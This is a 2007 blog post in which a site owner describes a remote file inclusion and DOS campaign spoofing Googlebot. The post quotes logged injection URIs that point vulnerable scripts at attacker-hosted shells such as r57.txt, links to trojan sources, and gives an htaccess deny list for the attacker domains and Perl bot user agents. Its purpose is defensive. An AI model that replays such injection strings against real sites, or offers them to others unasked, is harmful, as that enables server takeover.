Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan

    • Dec
    • 21

    Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan

    Posted by Noah Ark 9 months, 3 weeks ago.

    Filed under Security & injection.

    cat ownedFor this past three days this blog is suffering DOS attack . The attack is still alive now I don’t think they will leave yet.

    I cant banned this bot directly as they were sending forge packet (packet spoofing) as googlebot http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP.

    OrgName: Google Inc.
OrgID: GOGL
Address: 1600 Amphitheatre Parkway
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US

    At the time being I blocked all remote streams from their random host *.com and “perl bot signature” but blocking will not stop them from hammering this site. I’ll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later.

    Type of injections

    There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page.

    /es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja
 gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/order.php?wp=http://hom3.t35.com/xpl/hack/id.txt?

    To view the following source you need to exclude the website host from your anti-virus program.

    • Perl/ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
    • PHP/Rst.S Trojan - http://hom3.t35.com/xpl/fidz

    htaccess blocked bad Code Injector and Perl Bot (Botnet)

    If you has similar problems. you should block the following domain in your htaccess.
    mod_setenvif

    SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1
SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1
SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1

<FilesMatch "(.*)">
Order Allow,Deny
Allow from all
Deny from env=codeinjector_ref
Deny from env=shell_bots
</FilesMatch>

    if u arent sure if you server support mod_setenvif wrap it like the below example.

    <IfModule mod_setenvif.c>
#...replace this line with the above code...
</IfModule>

    How to trap Perl Shell Bot

    We need a pattern to trap this bots. certainly we knew that these bots :

    • doesn’t honor robot.txt
    • they crawl all subdirectory
    • they has a pattern URI request

    For now I only create subdirectory for auto-ban (and some other stuff) based on their pattern. alexa bot will be banned too as they dont honor robot.txt.

    I’ll be updating this post from time to time. Do check the related articles on how to packet spoofing and validating forge/spoof packet.

    Recent Scan & Update

    The below list is automatically added.

    December 24, 2007
    ip: 64.26.63.10 param: login=,? inject: http://pawang.in/r57.txt
    December 24, 2007
    ip: 64.26.63.10 param: dir=,login= inject: http://pawang.in/r57.txt????
    December 25, 2007
    ip: 59.158.128.138 param: p=,:allinurl= inject: http://gw-gold.net/jpg/pictures/test.txt

    External Resources

    About the Author

     

    Tags:
    • December 21, 2007 at 10:48 pm
    • February 16, 2008 at 3:05 am
    • 0.3
    • url

    • No Responses to Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan

      Trackback URL: Use the TrackBack url ↑ to ping this article. If your blog does not support Trackbacks you might want to leave a comment instead.
        • RE: Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan - 'The Guide' ↓
          Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan Kakkoi 9 months, 3 weeks ago 5 url
          Marvin, Point of View Gun

          The following "Code" are designed to protect you and other users of this site.

          • Be relevant: Your comment should be a thoughtful contribution to the subject of the entry. Keep your comments constructive and polite.
          • No advertising or spamming: Do not use the comment feature to promote commercial entities/products, affiliates services or websites. You are allowed to post a link as long as it's relevant to the entry.
          • Keep within the law: Do not link to offensive or illegal content websites. Do not make any defamatory or disparaging comments which might damage the reputation of a person or organisation.
          • Privacy: Do not post any personal information relating to yourself or anyone else - (ie: address, place of employment, telephone or mobile number or email address).

          In order to keep these experiences enjoyable and interesting for all of our users, we ask that you follow the above guidlines.

          be the first to comment.

          KakkoiFeel free to engage, ask questions, and tell us what you are thinking! Regular and insightful comments are most welcomed.

           

    "write as if you were talking to a good friend (in front of your mother)."

    .haveyoursay

    Disclaimer: For any content that you post, you hereby grant to Kakkoi the royalty-free, irrevocable, perpetual, exclusive and fully sublicensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, perform and display such content in whole or in part, world-wide and to incorporate it in other works, in any form, media or technology now known or later developed. Some rights reserved.

MySQL query error